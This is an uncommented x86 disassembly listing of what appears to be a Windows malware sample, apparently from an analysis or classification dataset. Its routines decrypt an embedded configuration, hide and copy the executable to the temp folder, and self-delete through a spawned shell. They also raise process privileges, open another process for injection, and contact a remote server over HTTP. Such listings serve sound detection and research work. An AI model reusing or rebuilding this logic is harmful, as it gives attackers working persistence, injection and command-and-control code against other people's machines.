sub_401004
push ebp
mov ebp esp
sub esp 0x24
push esi
push edi
push rw-data
mov edi ecx
push [ ebp + 0x8 ]
call fopen
mov esi eax
pop ecx
test esi esi
pop ecx
jne r-xdata
push 0x0
push 0x0
push esi
call fseek
add esp 0xc
call [ GetLastError@IAT ]
and [ ebp - 0x24 ] 0x0
push 0x7
mov edx eax
pop ecx
xor eax eax
lea edi [ ebp - 0x23 ]
[ edi ]
stosw [ edi ]
stosb [ edi ]
push edx
push rw-data
lea eax [ ebp - 0x24 ]
push rw-data
push eax
call sprintf
add esp 0x10
lea eax [ ebp - 0x24 ]
push eax
call [ OutputDebugStringA@IAT ]
jmp r-xdata
test [ esi + 0xc ] 0x10
jne r-xdata
cmp [ ebp + 0x9 ] 0x34
jne r-xdata
xor eax eax
push esi
call fclose
pop ecx
jmp r-xdata
cmp [ ebp + 0xa ] 0x5e
jne r-xdata
push esi
push 0x4
lea eax [ ebp + 0x8 ]
push 0x1
push eax
call fread
add esp 0x10
cmp [ ebp + 0x8 ] 0x1b
jne r-xdata
cmp [ ebp + 0xb ] 0x2d
je r-xdata
push esi
push 0x1
push [ ebp + 0x10 ]
push [ ebp + 0xc ]
call fread
push esi
push 0x1
lea eax [ ebp - 0x4 ]
push 0x4
push eax
call fread
push esi
push 0x1
push [ ebp - 0x4 ]
push edi
call fread
add esp 0x30
call [ GetLastError@IAT ]
and [ ebp - 0x24 ] 0x0
push 0x7
mov edx eax
pop ecx
xor eax eax
lea edi [ ebp - 0x23 ]
[ edi ]
stosw [ edi ]
stosb [ edi ]
push edx
push rw-data
lea eax [ ebp - 0x24 ]
push rw-data
push eax
call sprintf
add esp 0x10
lea eax [ ebp - 0x24 ]
push eax
call [ OutputDebugStringA@IAT ]
push esi
call fclose
pop ecx
push 0x1
pop eax
jmp r-xdata
pop edi
pop esi
leave
retn 0xc
sub_401120
push ebx
push esi
push edi
mov esi ecx
push rw-data
call [ LoadLibraryA@IAT ]
mov edi [ GetProcAddress@IAT ]
mov ebx eax
push rw-data
push ebx
call edi
push rw-data
push ebx
mov [ esi + 0x698 ] eax
call edi
push rw-data
push ebx
mov [ esi + 0x69c ] eax
call edi
mov [ esi + 0x6a0 ] eax
pop edi
pop esi
pop ebx
retn
sub_401166
push ebp
mov ebp esp
push ebx
mov ebx [ ebp + 0x8 ]
push esi
push edi
test ebx ebx
mov esi ecx
je r-xdata
xor al al
cmp [ ebp + 0xc ] 0x0
je r-xdata
cmp [ ebp + 0x14 ] 0x0
je r-xdata
mov eax [ ebp + 0x10 ]
lea edi [ eax + 0x7 ]
and edi 0xfffffff8
je r-xdata
push [ ebp + 0x18 ]
push [ ebp + 0x14 ]
call sub_40122e
cmp [ esi + 0x600 ] 0x0
jne r-xdata
sar edi 0x3
mov eax edi
test eax eax
jle r-xdata
sar edi 0x3
test edi edi
jle r-xdata
mov al 0x1
jmp r-xdata
cmp [ ebp + 0x1c ] 0x0
lea edi [ esi + 0x300 ]
mov [ ebp + 0x14 ] eax
sete [ ebp + 0x8 ]
push [ ebp + 0x1c ]
mov ecx esi
push esi
push [ ebp + 0xc ]
push ebx
call sub_401299
add [ ebp + 0xc ] 0x8
add ebx 0x8
dec edi
jne r-xdata
pop edi
pop esi
pop ebx
pop ebp
retn 0x18
push [ ebp + 0x1c ]
mov ecx esi
push esi
push [ ebp + 0xc ]
push ebx
call sub_401299
push [ ebp + 0x8 ]
mov ecx esi
push edi
push ebx
push ebx
call sub_401299
push [ ebp + 0x1c ]
mov ecx esi
push esi
push ebx
push ebx
call sub_401299
add [ ebp + 0xc ] 0x8
add ebx 0x8
dec [ ebp + 0x14 ]
jne r-xdata
jmp r-xdata
sub_40122e
push esi
mov esi ecx
push edi
push 0x10
lea edi [ esi + 0x701 ]
push 0x0
push edi
call memset
add esp 0xc
cmp [ esp + 0x10 ] 0x10
jle r-xdata
mov eax [ esp + 0x10 ]
push 0x10
pop eax
jmp r-xdata
xor al al
lea eax [ esi + 0x709 ]
mov ecx esi
push eax
lea eax [ esi + 0x300 ]
push eax
call sub_4013b3
mov al 0x1
jmp r-xdata
push eax
push [ esp + 0x10 ]
push edi
call memcpy
add esp 0xc
mov ecx esi
push edi
push esi
call sub_4013b3
cmp [ esp + 0x10 ] 0x8
jle r-xdata
mov [ esi + 0x600 ] al
pop edi
pop esi
retn 0x8
sub_401299
push ebp
mov ebp esp
push ebx
push esi
push edi
push 0x40
push [ ebp + 0xc ]
mov edi rw-data
mov ebx ecx
push edi
call sub_401582
push 0x40
push r--data
push edi
push edi
mov ecx ebx
call sub_4014e1
cmp [ ebp + 0x14 ] 0x0
mov eax [ ebp + 0x10 ]
jne r-xdata
add eax 0x2d0
mov [ ebp + 0x10 ] 0x10
mov [ ebp + 0x14 ] eax
mov esi rw-data
mov [ ebp + 0x14 ] eax
mov [ ebp + 0x10 ] 0x10
mov esi rw-data
push 0x20
push [ rw-data ]
push esi
call memcpy
add esp 0xc
mov ecx ebx
push [ ebp + 0x14 ]
push [ rw-data ]
call sub_401439
push 0x20
mov ecx ebx
push [ rw-data ]
push [ rw-data ]
call sub_401521
push 0x20
push esi
push [ rw-data ]
call memcpy
sub [ ebp + 0x14 ] 0x30
add esp 0xc
dec [ ebp + 0x10 ]
jne r-xdata
push 0x40
push r--data
push edi
push edi
mov ecx ebx
call sub_4014e1
push 0x40
push edi
push [ ebp + 0x8 ]
mov ecx ebx
call sub_4015b3
pop edi
pop esi
pop ebx
pop ebp
retn 0x10
push 0x20
push [ rw-data ]
push esi
call memcpy
add esp 0xc
mov ecx ebx
push [ ebp + 0x14 ]
push [ rw-data ]
call sub_401439
push 0x20
mov ecx ebx
push [ rw-data ]
push [ rw-data ]
call sub_401521
push 0x20
push esi
push [ rw-data ]
call memcpy
add [ ebp + 0x14 ] 0x30
add esp 0xc
dec [ ebp + 0x10 ]
jne r-xdata
jmp r-xdata
sub_4013b3
push ebx
push ebp
push esi
push edi
push 0x40
mov edi rw-data
push [ esp + 0x1c ]
mov ebx ecx
push edi
call sub_401582
push 0x38
push r--data
push edi
push edi
mov ecx ebx
call sub_4014e1
mov eax [ esp + 0x14 ]
xor ebp ebp
mov [ esp + 0x18 ] eax
movsx eax [ ebp + r--data ]
lea esi [ ebp + r--data ]
push eax
push 0x1c
mov ecx ebx
push [ rw-data ]
call sub_401541
movsx eax [ esi ]
push eax
push 0x1c
push [ rw-data ]
mov ecx ebx
call sub_401541
push 0x30
push r--data
push edi
mov ecx ebx
push [ esp + 0x24 ]
call sub_4014e1
add [ esp + 0x18 ] 0x30
inc ebp
cmp ebp 0x10
jl r-xdata
pop edi
pop esi
pop ebp
pop ebx
retn 0x8
sub_401439
push ebx
mov ebx [ esp + 0x8 ]
push esi
push edi
push 0x30
push r--data
mov esi rw-data
push ebx
mov edi ecx
push esi
call sub_4014e1
push 0x30
mov ecx edi
push [ esp + 0x18 ]
push esi
call sub_401521
push esi
push ebx
mov ecx edi
call sub_401482
push 0x20
push r--data
push ebx
push ebx
mov ecx edi
call sub_4014e1
pop edi
pop esi
pop ebx
retn 0x8
sub_401482
push ebp
mov ebp esp
push ecx
push ebx
push esi
mov esi [ ebp + 0xc ]
push edi
push 0x8
mov [ ebp - 0x4 ] ecx
xor edi edi
pop ebx
mov al [ esi + 0x1 ]
mov cl [ esi ]
shl al 0x1
add al [ esi + 0x2 ]
push 0x4
shl cl 0x1
add cl [ esi + 0x5 ]
shl al 0x1
add al [ esi + 0x3 ]
movsx ecx cl
shl al 0x1
add al [ esi + 0x4 ]
add ecx edi
shl ecx 0x4
movsx eax al
lea eax [ eax + ecx + r--data ]
mov ecx [ ebp - 0x4 ]
push eax
push [ ebp + 0x8 ]
call sub_401582
add [ ebp + 0x8 ] 0x4
add edi 0x4
add esi 0x6
dec ebx
jne r-xdata
pop edi
pop esi
pop ebx
leave
retn 0x8
sub_4014e1
push ebp
mov ebp esp
xor eax eax
cmp [ ebp + 0x14 ] eax
jle r-xdata
push [ ebp + 0x14 ]
add ecx 0x601
push ecx
push [ ebp + 0x8 ]
call memcpy
add esp 0xc
pop ebp
retn 0x10
push esi
mov edx [ ebp + 0x10 ]
mov esi [ ebp + 0xc ]
movsx edx [ eax + edx ]
inc eax
mov dl [ edx + esi - 0x1 ]
cmp eax [ ebp + 0x14 ]
mov [ ecx + eax + 0x600 ] dl
jl r-xdata
pop esi
sub_401521
push esi
mov esi [ esp + 0x10 ]
test esi esi
jle r-xdata
pop esi
retn 0xc
mov eax [ esp + 0x8 ]
mov ecx [ esp + 0xc ]
sub ecx eax
mov dl [ ecx + eax ]
xor [ eax ] dl
inc eax
dec esi
jne r-xdata
sub_401541
push ebx
push esi
mov esi [ esp + 0xc ]
push edi
mov edi [ esp + 0x18 ]
lea ebx [ ecx + 0x601 ]
push edi
push esi
push ebx
call memcpy
mov eax [ esp + 0x20 ]
sub eax edi
push eax
lea eax [ esi + edi ]
push eax
push esi
call memcpy
sub esi edi
push edi
add esi [ esp + 0x30 ]
push ebx
push esi
call memcpy
add esp 0x24
pop edi
pop esi
pop ebx
retn 0xc
sub_401582
xor eax eax
cmp [ esp + 0xc ] eax
jle r-xdata
retn 0xc
push esi
mov esi [ esp + 0xc ]
mov edx eax
sar edx 0x3
mov cl al
mov dl [ edx + esi ]
and cl 0x7
sar dl cl
mov ecx [ esp + 0x8 ]
and dl 0x1
mov [ eax + ecx ] dl
inc eax
cmp eax [ esp + 0x10 ]
jl r-xdata
pop esi
sub_4015b3
push ebp
mov ebp esp
mov eax [ ebp + 0x10 ]
push esi
sar eax 0x3
push edi
mov edi [ ebp + 0x8 ]
xor esi esi
push eax
push esi
push edi
call memset
add esp 0xc
cmp [ ebp + 0x10 ] esi
jle r-xdata
pop edi
pop esi
pop ebp
retn 0xc
mov edx [ ebp + 0xc ]
mov ecx esi
mov eax esi
and ecx 0x7
mov dl [ esi + edx ]
sar eax 0x3
shl dl cl
add eax edi
or [ eax ] dl
inc esi
cmp esi [ ebp + 0x10 ]
jl r-xdata
sub_40160e
push ebx
push ebp
push esi
mov esi ecx
push edi
xor ebx ebx
cmp [ esi + 0x4 ] ebx
mov edi 0x2000
mov ebp edi
jne r-xdata
push edi
call malloc
cmp eax ebx
pop ecx
mov [ esi + 0x4 ] eax
je r-xdata
push ebx
call free
pop ecx
pop edi
pop esi
pop ebp
pop ebx
retn
push ebx
push edi
push eax
push 0x5
call [ esi ]
mov ebx 0xc0000004
add ebp edi
push ebp
push [ esi + 0x4 ]
call realloc
pop ecx
mov [ esi + 0x4 ] eax
pop ecx
push 0x0
push ebp
push eax
push 0x5
call [ esi ]
jmp r-xdata
cmp eax ebx
jne r-xdata
sub_401689
push ebp
mov ebp esp
sub esp 0x1c
lea eax [ ebp - 0x4 ]
push esi
push eax
push 0x20028
call [ GetCurrentProcess@IAT ]
push eax
call [ OpenProcessToken@IAT ]
test eax eax
je r-xdata
pop esi
leave
retn 0x8
lea eax [ ebp - 0xc ]
xor esi esi
push eax
push [ ebp + 0x8 ]
push esi
call [ LookupPrivilegeValueA@IAT ]
test eax eax
jne r-xdata
mov eax [ ebp - 0xc ]
push esi
mov [ ebp - 0x18 ] eax
mov eax [ ebp - 0x8 ]
mov [ ebp - 0x14 ] eax
mov eax [ ebp + 0xc ]
neg eax
sbb eax eax
push esi
and eax 0x2
push esi
mov [ ebp - 0x10 ] eax
lea eax [ ebp - 0x1c ]
push eax
push esi
push [ ebp - 0x4 ]
mov [ ebp - 0x1c ] 0x1
call [ AdjustTokenPrivileges@IAT ]
push [ ebp - 0x4 ]
call [ CloseHandle@IAT ]
call [ GetLastError@IAT ]
neg eax
sbb eax eax
inc eax
push 0x1
pop eax
jmp r-xdata
sub_40170d
push ebp
mov ebp esp
sub esp 0xc
push ebx
push esi
push edi
mov esi ecx
call sub_40160e
xor ebx ebx
mov edi [ MultiByteToWideChar@IAT ]
push ebx
push ebx
push 0xffffffff
mov [ ebp - 0x4 ] ebx
push [ ebp + 0x8 ]
push ebx
push ebx
call edi
mov [ ebp - 0xc ] eax
add eax eax
push eax
call ??2@YAPAXI@Z
pop ecx
mov [ ebp - 0x8 ] eax
push [ ebp - 0xc ]
push eax
push 0xffffffff
push [ ebp + 0x8 ]
push ebx
push ebx
call edi
cmp [ eax + 0x3c ] ebx
jne r-xdata
mov [ ebp - 0x4 ] 0x1
mov eax [ esi + 0x4 ]
push 0x4
push [ eax + 0x3c ]
push [ ebp - 0x8 ]
call _wcsnicmp
add esp 0xc
test eax eax
mov eax [ esi + 0x4 ]
je r-xdata
add ecx eax
mov [ esi + 0x4 ] ecx
mov esi [ eax + 0x44 ]
jmp r-xdata
mov ecx [ eax ]
add ecx eax
cmp [ ebp - 0x4 ] ebx
mov [ esi + 0x4 ] ecx
jne r-xdata
push [ ebp - 0x8 ]
call ??3@YAXPAX@Z
pop ecx
mov eax esi
pop edi
pop esi
pop ebx
leave
retn 0x4
mov esi [ ebp + 0x8 ]
jmp r-xdata
mov eax [ esi + 0x4 ]
mov ecx [ eax ]
cmp ecx ebx
jne r-xdata
sub_4017ff
push ebp
mov ebp esp
sub esp 0x210
and [ ebp - 0x10c ] 0x0
push ebx
push esi
push edi
push 0x40
xor eax eax
pop ecx
lea edi [ ebp - 0x10b ]
[ edi ]
and [ ebp - 0x210 ] 0x0
push 0x40
stosw [ edi ]
stosb [ edi ]
pop ecx
xor eax eax
lea edi [ ebp - 0x20f ]
[ edi ]
stosw [ edi ]
lea ecx [ ebp - 0x8 ]
stosb [ edi ]
call sub_4015f5
mov ebx 0x104
lea eax [ ebp - 0x10c ]
push ebx
push eax
push 0x0
call [ GetModuleFileNameA@IAT ]
lea eax [ ebp - 0x10c ]
push ebx
push eax
lea eax [ ebp - 0x10c ]
push eax
call [ GetLongPathNameA@IAT ]
push 0xd42
mov esi rw-data
push 0x0
push esi
call memset
add esp 0xc
mov edi rw-data
lea eax [ ebp - 0x10c ]
mov ecx rw-data
push 0x10
push edi
push eax
call sub_401004
push 0x1
push 0x10
push edi
push 0xd42
push esi
push esi
mov ecx rw-data
call sub_401166
mov ecx rw-data
call sub_401120
push 0x10
push edi
push rw-data
call memcpy
add esp 0xc
xor edi edi
push edi
call [ SetLastError@IAT ]
push esi
push 0x1
push edi
call [ CreateMutexA@IAT ]
cmp eax edi
mov [ rw-data ] eax
je r-xdata
lea ecx [ ebp - 0x8 ]
call sub_4015ff
pop edi
pop esi
xor eax eax
pop ebx
leave
retn 0x10
call [ GetLastError@IAT ]
cmp eax 0xb7
je r-xdata
lea eax [ ebp - 0x10c ]
push eax
push rw-data
call strcpy
pop ecx
lea eax [ ebp - 0x10c ]
pop ecx
push 0x2
push eax
call [ SetFileAttributesA@IAT ]
lea eax [ ebp - 0x210 ]
push eax
push ebx
call [ GetTempPathA@IAT ]
lea eax [ ebp - 0x210 ]
push ebx
push eax
lea eax [ ebp - 0x210 ]
push eax
call [ GetLongPathNameA@IAT ]
lea eax [ ebp - 0x210 ]
push eax
push rw-data
call strcpy
cmp [ rw-data ] edi
pop ecx
pop ecx
je r-xdata
call sub_4019cc
test eax eax
jne r-xdata
push 0x1
push rw-data
lea ecx [ ebp - 0x8 ]
call sub_401689
lea ecx [ ebp - 0x8 ]
call sub_401666
call sub_402730
push rw-data
lea ecx [ ebp - 0x8 ]
call sub_40170d
push 0x3e8
mov esi eax
call [ Sleep@IAT ]
cmp esi edi
jbe r-xdata
push esi
push edi
push 0x1f0fff
call [ OpenProcess@IAT ]
mov esi eax
push esi
call sub_4024c9
push esi
call [ CloseHandle@IAT ]
jmp r-xdata
sub_4019cc
push ebp
mov ebp esp
sub esp 0x158
push ebx
push esi
push edi
push [ rw-data ]
call [ ReleaseMutex@IAT ]
push 0x40
xor ebx ebx
pop ecx
xor eax eax
lea edi [ ebp - 0x157 ]
mov [ ebp - 0x158 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp - 0x158 ]
push rw-data
push eax
call [ lstrcpyA@IAT ]
lea eax [ ebp - 0x158 ]
push eax
call strlen
cmp [ ebp + eax - 0x159 ] 0x5c
mov esi [ lstrcatA@IAT ]
pop ecx
je r-xdata
lea eax [ ebp - 0x158 ]
push rw-data
push eax
call esi
mov esi rw-data
lea eax [ ebp - 0x158 ]
push esi
push eax
call [ lstrcmpiA@IAT ]
test eax eax
je r-xdata
lea eax [ ebp - 0x158 ]
push rw-data
push eax
call esi
xor eax eax
lea eax [ ebp - 0x158 ]
push ebx
push eax
push esi
call [ CopyFileA@IAT ]
call sub_401ac8
push 0x44
lea eax [ ebp - 0x54 ]
pop esi
push esi
push ebx
push eax
call memset
push 0x10
lea eax [ ebp - 0x10 ]
push ebx
push eax
mov [ ebp - 0x54 ] esi
call memset
add esp 0x18
push eax
mov eax edx
add eax ecx
mov eax 0x1
sub eax 0x5
pop eax
lea eax [ ebp - 0x10 ]
push eax
lea eax [ ebp - 0x54 ]
push eax
push ebx
push ebx
push ebx
push ebx
push ebx
lea eax [ ebp - 0x158 ]
push ebx
push eax
push ebx
call [ CreateProcessA@IAT ]
push 0x1
pop eax
jmp r-xdata
pop edi
pop esi
pop ebx
leave
retn
sub_401ac8
push ebp
mov ebp esp
sub esp 0x348
push ebx
push esi
mov esi 0x104
push edi
lea eax [ ebp - 0x140 ]
push esi
xor edi edi
push eax
push edi
call [ GetModuleFileNameA@IAT ]
test eax eax
je r-xdata
xor eax eax
lea eax [ ebp - 0x140 ]
push esi
push eax
lea eax [ ebp - 0x140 ]
push eax
call [ GetShortPathNameA@IAT ]
test eax eax
je r-xdata
lea eax [ ebp - 0x348 ]
push esi
push eax
push rw-data
call [ GetEnvironmentVariableA@IAT ]
test eax eax
je r-xdata
lea eax [ ebp - 0x244 ]
push rw-data
push eax
call [ lstrcpyA@IAT ]
mov esi [ lstrcatA@IAT ]
lea eax [ ebp - 0x140 ]
push eax
lea eax [ ebp - 0x244 ]
push eax
call esi
lea eax [ ebp - 0x244 ]
push rw-data
push eax
call esi
lea eax [ ebp - 0x348 ]
mov [ ebp - 0x34 ] edi
mov [ ebp - 0x2c ] eax
lea eax [ ebp - 0x244 ]
mov [ ebp - 0x24 ] edi
mov [ ebp - 0x20 ] edi
mov edi [ GetCurrentProcess@IAT ]
push 0x100
mov [ ebp - 0x3c ] 0x3c
mov [ ebp - 0x30 ] rw-data
mov [ ebp - 0x28 ] eax
mov [ ebp - 0x38 ] 0x40
call edi
mov esi [ SetPriorityClass@IAT ]
push eax
call esi
mov ebx [ GetCurrentThread@IAT ]
push 0xf
call ebx
push eax
call [ SetThreadPriority@IAT ]
lea eax [ ebp - 0x3c ]
push eax
call [ ShellExecuteExA@IAT ]
test eax eax
je r-xdata
push 0x20
call edi
push eax
call esi
push 0x0
call ebx
push eax
call [ SetThreadPriority@IAT ]
push 0x40
push [ ebp - 0x4 ]
call esi
push 0x1
push [ ebp - 0x4 ]
call [ SetProcessPriorityBoost@IAT ]
push 0x1
pop eax
jmp r-xdata
pop edi
pop esi
pop ebx
leave
retn
sub_401bf5
push ebp
mov ebp esp
sub esp 0x67c
push ebx
push esi
push edi
push 0x3f
xor ebx ebx
pop ecx
xor eax eax
lea edi [ ebp - 0x57b ]
mov [ ebp - 0x57c ] bl
push 0x7
[ edi ]
stosw [ edi ]
stosb [ edi ]
pop ecx
xor eax eax
lea edi [ ebp - 0xb3 ]
mov [ ebp - 0xb4 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
push 0x40
xor eax eax
pop ecx
lea edi [ ebp - 0x27b ]
mov [ ebp - 0x27c ] bl
mov esi [ ebp + 0x8 ]
[ edi ]
stosw [ edi ]
stosb [ edi ]
mov eax [ esi + 0xd26 ]
mov [ ebp - 0x2c ] ebx
mov [ ebp - 0x58 ] eax
mov eax [ esi + 0xd2a ]
mov [ ebp - 0xc ] eax
mov eax [ esi + 0xd36 ]
mov [ ebp - 0x68 ] eax
mov eax [ esi + 0xd3e ]
mov [ ebp - 0x40 ] eax
lea eax [ esi + 0x6d4 ]
push eax
mov [ ebp - 0x28 ] ebx
mov [ ebp - 0x24 ] ebx
mov [ ebp - 0x38 ] ebx
mov [ ebp - 0x3c ] 0x1
call [ esi + 0x698 ]
cmp eax ebx
mov [ ebp - 0x18 ] eax
je r-xdata
pop edi
pop esi
pop ebx
leave
retn 0x4
lea eax [ esi + 0x6a4 ]
push eax
call [ esi + 0x698 ]
cmp eax ebx
mov [ ebp - 0x34 ] eax
je r-xdata
lea eax [ esi + 0x6b4 ]
push eax
call [ esi + 0x698 ]
cmp eax ebx
mov [ ebp + 0x8 ] eax
je r-xdata
lea eax [ esi + 0x6e4 ]
push eax
call [ esi + 0x698 ]
test eax eax
je r-xdata
lea eax [ esi + 0x6f4 ]
push eax
call [ esi + 0x698 ]
mov edi eax
cmp edi ebx
je r-xdata
lea eax [ esi + 0x708 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x5c ] eax
je r-xdata
lea eax [ esi + 0x738 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x7c ] eax
je r-xdata
lea eax [ esi + 0x718 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x64 ] eax
je r-xdata
lea eax [ esi + 0x728 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x84 ] eax
je r-xdata
mov edi [ ebp + 0x8 ]
lea eax [ esi + 0x9de ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x78 ] eax
je r-xdata
lea eax [ esi + 0xa2e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp + 0x8 ] eax
je r-xdata
lea eax [ esi + 0xa0e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x80 ] eax
je r-xdata
lea eax [ esi + 0x9ee ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x70 ] eax
je r-xdata
mov edi [ ebp - 0x34 ]
lea eax [ esi + 0xc5e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x1c ] eax
je r-xdata
lea eax [ esi + 0xc8e ]
push eax
push [ ebp - 0x18 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x6c ] eax
je r-xdata
lea eax [ esi + 0xc3e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x44 ] eax
je r-xdata
lea eax [ esi + 0xc4e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x14 ] eax
je r-xdata
lea eax [ esi + 0xc7e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x48 ] eax
je r-xdata
lea eax [ esi + 0x77c ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x30 ] eax
je r-xdata
lea eax [ esi + 0x7bc ]
push eax
push edi
call [ esi + 0x69c ]
test eax eax
je r-xdata
lea eax [ esi + 0x76c ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x8 ] eax
je r-xdata
lea eax [ esi + 0x868 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x4 ] eax
je r-xdata
lea eax [ esi + 0x7f4 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x74 ] eax
je r-xdata
lea eax [ esi + 0x82c ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x54 ] eax
je r-xdata
lea eax [ esi + 0x800 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x4c ] eax
je r-xdata
lea eax [ esi + 0x8b4 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x10 ] eax
je r-xdata
lea eax [ esi + 0xc26 ]
push eax
push [ ebp - 0x18 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x50 ] eax
je r-xdata
lea eax [ esi + 0xa9e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x60 ] eax
je r-xdata
lea eax [ esi + 0x794 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x34 ] eax
je r-xdata
push esi
push ebx
push ebx
call [ ebp - 0x8 ]
cmp eax ebx
je r-xdata
push 0xffffffff
push eax
call [ ebp - 0x4 ]
lea eax [ esi + 0x1f8 ]
push eax
lea eax [ ebp - 0x27c ]
push eax
call [ ebp - 0x14 ]
lea eax [ ebp - 0x27c ]
push eax
call [ ebp - 0x44 ]
cmp [ ebp + eax - 0x27d ] 0x5c
je r-xdata
lea eax [ esi + 0xd4 ]
push eax
lea eax [ ebp - 0x27c ]
push eax
call [ ebp - 0x1c ]
cmp [ esi + 0x3b8 ] ebx
je r-xdata
lea eax [ esi + 0x30 ]
push eax
lea eax [ ebp - 0x27c ]
push eax
call [ ebp - 0x1c ]
push 0x20
pop eax
mov [ ebp - 0x2c ] eax
push eax
lea eax [ ebp - 0xb4 ]
push eax
call [ ebp - 0x10 ]
lea eax [ ebp - 0x20 ]
push eax
lea eax [ esi + 0x60 ]
push eax
push [ esi + 0xc0 ]
call [ ebp - 0x5c ]
lea eax [ ebp - 0x2c ]
lea edi [ esi + 0xa0 ]
push eax
lea eax [ ebp - 0xb4 ]
push eax
lea eax [ ebp - 0x3c ]
push eax
push ebx
push edi
push [ ebp - 0x20 ]
call [ ebp - 0x7c ]
lea eax [ ebp - 0x27c ]
push eax
lea eax [ ebp - 0xb4 ]
push eax
call [ ebp - 0x48 ]
test eax eax
je r-xdata
lea edi [ esi + 0xf4 ]
lea eax [ ebp - 0x27c ]
push edi
push eax
call [ ebp - 0x48 ]
test eax eax
je r-xdata
push [ ebp - 0x20 ]
call [ ebp - 0x84 ]
lea eax [ ebp - 0x134 ]
push 0x80
push eax
call [ ebp - 0x10 ]
lea eax [ esi + 0x4dc ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call [ ebp - 0x14 ]
lea eax [ esi + 0x4fc ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call [ ebp - 0x1c ]
lea eax [ esi + 0x53c ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call [ ebp - 0x1c ]
push ebx
push ebx
push ebx
lea eax [ esi + 0x4ec ]
push ebx
push eax
call [ ebp - 0x78 ]
mov edi eax
cmp edi ebx
mov [ ebp - 0x8 ] edi
jne r-xdata
lea eax [ ebp - 0x27c ]
push eax
call [ ebp - 0x44 ]
push eax
lea eax [ ebp - 0x27c ]
push eax
push 0x1
push ebx
push edi
push [ ebp - 0x20 ]
call [ ebp - 0x64 ]
lea eax [ ebp - 0x27c ]
push ebx
push eax
push edi
call [ ebp - 0x74 ]
push 0x80
push edi
call [ ebp - 0x54 ]
push edi
call [ ebp - 0x4c ]
push ebx
push 0xc4000100
push ebx
lea eax [ ebp - 0x134 ]
push ebx
push eax
push edi
call [ ebp - 0x70 ]
cmp eax ebx
mov [ ebp - 0x4 ] eax
jne r-xdata
push [ esi + 0x4c0 ]
push 0x1
push esi
call [ ebp - 0xc ]
jmp r-xdata
mov edi 0x100
lea eax [ ebp - 0x47c ]
push edi
push eax
call [ ebp - 0x10 ]
lea eax [ ebp - 0x28 ]
mov [ ebp - 0x28 ] ebx
push eax
lea eax [ ebp - 0x47c ]
push edi
push eax
push [ ebp - 0x4 ]
call [ ebp - 0x80 ]
push [ ebp - 0x4 ]
test eax eax
jne r-xdata
push edi
jmp r-xdata
call [ ebp + 0x8 ]
lea eax [ ebp - 0x67c ]
push edi
push eax
call [ ebp - 0x10 ]
lea eax [ ebp - 0x67c ]
push eax
lea eax [ ebp - 0x47c ]
push eax
push esi
call [ ebp - 0x68 ]
test eax eax
jne r-xdata
call [ ebp + 0x8 ]
push [ ebp - 0x8 ]
jmp r-xdata
call [ ebp + 0x8 ]
jmp r-xdata
lea eax [ ebp - 0x37c ]
push edi
push eax
call [ ebp - 0x10 ]
push 0x1
pop eax
push [ ebp - 0x8 ]
call [ ebp + 0x8 ]
push [ ebp - 0x4 ]
mov [ ebp + eax - 0x37c ] bl
lea eax [ esi + 0x28 ]
push eax
lea eax [ ebp - 0x37c ]
push eax
call [ ebp - 0x6c ]
pop ecx
cmp eax ebx
pop ecx
mov [ ebp - 0x18 ] eax
je r-xdata
mov [ ebp + eax - 0x37d ] cl
inc eax
cmp eax edi
jl r-xdata
mov edi [ ebp - 0x1c ]
lea eax [ ebp - 0x47c ]
push edi
push eax
call [ ebp - 0x10 ]
mov edi [ ebp - 0x18 ]
lea eax [ esi + 0x2c ]
push eax
lea eax [ ebp - 0x47c ]
push eax
mov [ edi ] bl
call [ ebp - 0x14 ]
lea eax [ edi + 0x1 ]
mov edi [ ebp - 0x1c ]
push eax
lea eax [ ebp - 0x47c ]
push eax
call edi
lea eax [ ebp - 0x47c ]
mov [ ebp - 0x18 ] eax
jmp r-xdata
mov cl [ ebp + eax - 0x67c ]
cmp cl bl
je r-xdata
sub eax 0x65
je r-xdata
movsx eax [ ebp - 0x67c ]
cmp eax 0x64
jg r-xdata
lea eax [ ebp - 0x134 ]
push 0x80
push eax
call [ ebp - 0x10 ]
lea eax [ esi + 0x4dc ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call [ ebp - 0x14 ]
lea eax [ esi + 0x4fc ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call edi
lea eax [ esi + 0x34 ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call edi
lea eax [ ebp - 0x37c ]
push eax
lea eax [ ebp - 0x134 ]
push eax
call edi
lea eax [ ebp - 0x134 ]
